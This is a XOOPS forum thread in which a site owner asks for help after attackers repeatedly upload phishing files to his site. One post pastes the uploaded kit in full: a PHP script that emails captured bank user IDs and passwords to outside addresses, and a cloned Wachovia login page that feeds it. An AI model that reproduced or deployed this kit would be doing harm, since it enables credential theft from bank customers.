1
dizzymarkus
Re: lost admin menu

Thats the funny part -- to be honest I didnt make any changes -- its a site for a local soccer club and doesnt get much int he shape of updating. They asked me to change something so I logged ina s admin and am thanked lol but no menu appears. I followed the mentioned FAQ and al is 1's and full privledges.

Thanks for the response,
Markus



2
dizzymarkus
Re: lost admin menu

I am the only admin and it thanks me (admin) for loggin in -- I did try admin.php but tells me I dont have the right to access this area-- rof duh I am the admin -- How to go about the DB work to restore it -- thanks greatly for your response,
Markus



3
dizzymarkus
lost admin menu

Howdy,
I have been using XOOPS for some time, not on the forums much because it just works :0) -- I have an issue -- I seem to have hidden my admin menu by mistake, and even tho I can login as admin I can not get to anything. Has anyone got a cure for this so I may get the adminmenu back wothout redoing everything? If this has already been addressed I apoligize I did some searching but this forum is very vast in posts :0)

Thank greatly,
Markus



4
dizzymarkus
lost admin menu

It seems I must have hiddenmy adminmenu. I am able to login but cannot see the admin menu. Do I have to do a reinstall to reobtain the adminmenu? I have tried admin.php but tells me I donthave permission yet I am logged in as admin.

Thank you greatly,
Markus



5
dizzymarkus
Re: Open holes and hacked

My bad on the gaining access wording -- lol I was thinking how the "" did they get in while I was typing it :0( SORRY


This has happened three times -- only once has a folder been in the uploads directory the other two it was in the root.( I also added the htaccess in the meantime)

Thank you for the google abuse tip -- I will send it out today to them. :0)

Still am afraid to reopen the site as this is the third strike with my hosting.It happenes again they are gonna lock my account.I never had a problem with previous versions of XOOPS in the last 2 years until now. I even email that person and told them there is no bank info on a free site and nothing is sold -- please remove me from your phishing list. They actually had the balls to return my email with a note "THANKS FOR THE INFO" and thats it. Thanks for all the help you guys are giving.

Markus



6
dizzymarkus
Re: Open holes and hacked

BUMP.............................

Anyone please?


Thank you
Markus



7
dizzymarkus
Re: Open holes and hacked

Ok heres the skinny on how they are gaining access or so I believe.

For some reason they can gain access and get this uploaded which makes it own folder called "seite", once as "module" (instead of modules (9 i caught that one lol) and once an html file in he uploads directory. ( I have since adjusted permisions, changed account password, rechecked main_file.php and added the htaccess that was mentioned here.


I had a wierd file called modules.zip -- I downloaded and looked in it. It had two files --

1. LOGIN.PHP

<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>

$ip getenv("REMOTE_ADDR");
$message .= "------------------------------n";
$message .= "User ID: ".$_POST['userid']."n";
$message .= "Password: ".$_POST['password']."n";
$message .= "IP: ".$ip."n";
$message .= "-------Created By Palmers-------n";


$recipient "darkcrews@gmail.com,www.crew@gmail.com";
$subject "WaChoviA";
$headers "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
     if (
mail($recipient,$subject,$message,$headers))
       {
           
header("Location: http://www.wachovia.com");

       }
else
           {
         echo 
"ERROR! Please go back and try again.";
         }

?>


<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>



and an htm file called SERVICE.HTM

<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>


DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<
html xmlns="http://www.w3.org/1999/xhtml">
<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
meta http-equiv="Pragma" content="no-cache" />
<
meta http-equiv="Cache-Control" content="no-cache" />
<
meta http-equiv="Expires" content="Mon, 01 Jan 2001 13:00:00 GMT" />
<
title>Online Services Account Logintitle>
    <
link href="https://onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />
    <
link href="https://onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
    <
style type="text/css">@import url("/ols/css/interference.css");style>
    <
link href="https://onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />
    <
script type="text/javascript" language="JavaScript1.2" src="https://www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js">script>

<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/utility.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/messaging.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/login.js">script>
<
script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/bidata.js">script>
<
script type="text/javascript" language="JavaScript">

script>
head>
<
body id="default" class="twocol login" onunload="passReset();enableSubmits();">

<
form method="post" action="/auth/AuthService" name="dualForm" id="dualForm" onsubmit="return disableSubmits();">
    <
input type="hidden" name="action" value="presentLogin" />
    <
input type="hidden" name="credtype" value="DUAL" />
        <
input type="hidden" name="credtype" value="UID" />
form>
<
div id="limiter">
<
div id="header"><img src="https://onlineservices.wachovia.com/ols/images/logo.gif" alt="Wachovia Logo" width="240" height="52" id="logo" /><script type="text/javascript" language="JavaScript">setBrand();script>
        <
img src="https://onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" width="246" height="21" id="subbrand" />
    div>
    <
div id="pusher">
        <
div id="content">
            <
div id="main">                
                <
h1>Online Services Loginh1>                
                <
div id="details">        
                <
p>Enter the appropriate login information below, and select your service.p>                
                div>                    
                <
ul>
                <
li>Retirement Plan Participants: <a href="https://commercial.wachovia.com/Online/Financial/Business/Service?action=wrsLogin">Logina>li>
                ul>                
                <
form method="post" action="login.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return disableSubmits();">
        <
input type="hidden" name="credtype" value="UID" />
                <
input type="hidden" value="uidLogin" name="action" />
                <
input type="hidden" value="" name="bi" />
                <
input type="hidden" value="" name="requestTimestamp" />
                <
table border="0" cellpadding="0" cellspacing="0" class="formtable">
                <
tr>
                    <
td class="colgutter">td>
                    <
td class="label"><label for="userid">User IDlabel>
                    <
td class="colgutter">td>
                    <
td><input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="1">td>
                tr>
                <
tr>
                    <
td colspan="3">td>
                    <
td>
                        <
label for="rememberuid" class="nestinput"><input type="checkbox" name="rememberuid" id="rememberuid" tabindex="6" />Remember my User IDlabel>&nbsp;&nbsp;&nbsp;
                        <
a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/remember_my_user_id.htm')" tabindex="7" >Learn Morea>
                    td>
                tr>
                <
tr>
                    <
td>td>
                    <
td class="label" nowrap="nowrap"><label for="password">Passwordlabel>td>
                    <
td class="colgutter">td>
                    <
td><input type="password" name="password" id="password" autocomplete="off" value="" tabindex="2" />td>
                tr>
                <
tr><td>td><td>td><td>td><td><div class="format">Case Sensitivediv>td>tr>                
                <
tr>
                    <
td>td>
                    <
td class="label" nowrap="nowrap"><label for="service">Service Selectionlabel>td>
                    <
td class="colgutter">td>
                    <
td>
                    <
select name="systemtarget"  width="160" onchange="getValue(this.form.name);" tabindex="3">
                        <
option value="gotoOSH">Choose a service...option>
                        <
option value="gotoOSH">Online Services Homeoption>
                        <
option value="gotoBanking">Online Bankingoption>
                        <
option value="gotoBillPay">Online BillPayoption>
                        <
option value="gotoBrokerage">Online Brokerageoption>
                    select>
                    td>
                tr>                
                <
tr>
                    <
td colspan="4" class="center">
                    
                    <
input type="submit" value="Login" tabindex="4" class="button w80" id="submitButton" name="submitButton">
                    td>
                tr>
                table>
                form>
            div>
            <
div id="related" class="clear">
                <
div class="box">
                    <
h2><span>Customer Servicespan>h2>
                    <
h3>h3>
                    <
ul>
                        <
li><a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/user_id_and_password_rules.htm')">User ID &ampPassword Helpa>li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=USERIDLOOKUP&credtype=UID">Forgot your User ID?a>li>
                        <
li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=/auth/AuthService&credtype=UID">Reset your Passworda>li>
                    ul>
                    
                    <
h3>h3>
                    <
ul class="small">
                        <
li>Customer Access Number: <a href="#" onclick="return submitForm('dualForm');">Logina>li>
                    ul>                    
                div>
                <
div id="promo">
                <
script type="text/javascript" language="JavaScript">
                
                
script>
                div>
            div>
            <
hr class="textonly" />
            <
div id="navigation" class="blue">
                <
h2 class="ir">Navigationh2>                
                <
div id="utilities" class="utility">div>        
                <
div id="global" class="utility">
                    <
ul>                    
                        <
li class="first" id="officelocator"><a href="http://www.wachoviasec.com/home/locator.asp" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locatora>li>
                        <
li class="first" id="locations"><a href="http://wachovia.via.infonow.net/locator/?src=OLB" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Locationsa>li>
                    ul>                    
                div>
            div>
        div>
    div>
    <
hr class="textonly" />
    <
div id="footer">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="http://www.wachovia.com/popup/agreement/" target="popupwin" onclick="return popWinStnd(this.href);">Customer Agreementa>li>
            <
li><a href="http://www.wachovia.com/popup/privacy/" target="popupwin" onclick="return popWinStnd(this.href);">Privacya>li>
            <
li><a href="http://www.wachovia.com/popup/security/" target="popupwin" onclick="return popWinStnd(this.href);">Securitya>li>
            <
li><a href="http://www.wachovia.com/popup/legal/" target="popupwin" onclick="return popWinStnd(this.href);">Legala>li>
        ul>
        <
div id="copyright">&copy2007 Wachovia CorporationAll rights reserved.div>
    div>
    <
div id="footeralt">
        <
ul id="footerlinks" class="utility">
            <
li class="first"><a href="https://wachseconline.wachovia.com/LD_Privacy.html" target="popupwin" onclick="return popWinStnd(this.href);">Privacya>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Security.html" target="popupwin" onclick="return popWinStnd(this.href);">Securitya>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_AccessOnlineAgree.html" target="popupwin" onclick="return popWinStnd(this.href);">Legal Disclosuresa>li>
            <
li><a href="https://wachseconline.wachovia.com/LD_Contact.html" target="popupwin" onclick="return popWinStnd(this.href);">Contact Usa>li>
        ul>
        <
div id="copyright">&copy2007 Wachovia SecuritiesLLC (member NYSE/SIPC)div>
        <
table id="notmay">
        <
caption>Securities and Insurance Products:<caption>
        <
tr>
            <
td>Not Insured by FDIC or any<br />Federal Government Agencytd>
            <
td>May Lose<br />Valuetd>
            <
td>Not a Deposit of or Guaranteed by<br />a Bank or any Bank affiliatetd>
        tr>
        table>
        <
div id="disclosure">
        <
p>Wachovia Securities is the trade name used by two separateregistered broker-dealers and non-bank affiliates of 
        Wachovia Corporation providing certain retail securities brokerage services
Wachovia SecuritiesLLCmember 
        NYSE
/SIPC, and Wachovia Securities Financial NetworkLLCmember <span class="small">NASDspan>/SIPC.  Accounts 
        carried by First Clearing
LLCmember NYSE/SIPC.p>
        <
p>Insurance products are offered through non-bank affiliates of Wachovia Corporation and are underwritten by unaffiliated 
        insurance companies
.p>
        div>
    div>
div>
<
script language="JavaScript">

script>


<script type="text/javascript" language="JavaScript" id="_hbc">

script>
<
script type="text/javascript" language="JavaScript1.1" defer="defer" src="https://www.wachovia.com/metrics/stats.js">script>






<
script language="JavaScript">
var 
axel Math.random()+"";
var 
axel 10000000000000;
document.write(''?" width="1" height="1" border="0">');
script>
<
noscript>
<
img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">
noscript>

body>
html>


<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>


I would appreciate any help given in how to stop this -- apparently I have a three strike rule with my host and I will be asked to go to another server. :0(


Thank you,
Markus



8
dizzymarkus
Re: Open holes and hacked


" Can you summarize which version of XOOPS you use and which modules are installed? "

Xoops Version ---- 2.0.16
pical
XOOPS stats
even news
XOOPS polls
xc gallery
my iframe
XOOPS links
tiny d
tiny content
content
classified ads (P'tites annonces)
xt conteudo
2 other instances of my iframe also
world weather

Thank you


Good idea on the htaccess -- I will add one tonite. Thank you

The web server logs are a nightmare :0( I go into my control panel and dload the raw access logs -- unRAR them and they unzip as a msdos application (looks like an exe icon but properities says "msdos application". Hosting says right click and choose notepad or wordpad -- no "open with" option for this when right clicking on the file. I am unsure what to do here with trying to view them.

Thanks greatly for all the responses. I have since changed chmod on the upload directory and informed the members it is temporaly disabled due to the fradulant activity.


Markus



9
dizzymarkus
Re: Open holes and hacked

I thought so also (SS issue) but as hosting goes lol they say there must be a hole or backdoor into the script. I have run this (xoops) for 3 years now with this addy and server with no problems. Thanks for the heads up on protector-- I will be looking inot it tonite.

Thank you ,
Markus



10
dizzymarkus
Open holes and hacked

Two times in three weeks someone or some people have hacked into my XOOPS site and actually uploaded files to my server. Phishing for Wachovia Bank info.

The first time they uloaded a folder named "module" -- I saw it that morning and thought that was wierd, that shouldnt be there -- off to work I went -- account was suspended by the time I got home.I removed the folder in question and they turned me back on.

The second time (3 weeks later and an account password change) whoever uploaded approx. 12 files to the "uploads" directory. Mostly php files and 2 text files -- again phishing for bank info. I searched all my files and folders for stuff that didnt belong. How are they getting in?

Is there any known holes or backdoors for people to get in ? I cannot access my raw logs as the unRAR as a msdos file and I cannot get it to open correcly.

So once to the main directory tree and once to the uploads directory. Thank for anyhelp given for this as its getting very frustrating.


Markus








http://www.ocqmc.com




TopTop
(1) 2 3 4 ... 11 »



Login

Who's Online

224 user(s) are online (150 user(s) are browsing Support Forums)


Members: 0


Guests: 224


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Jun 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits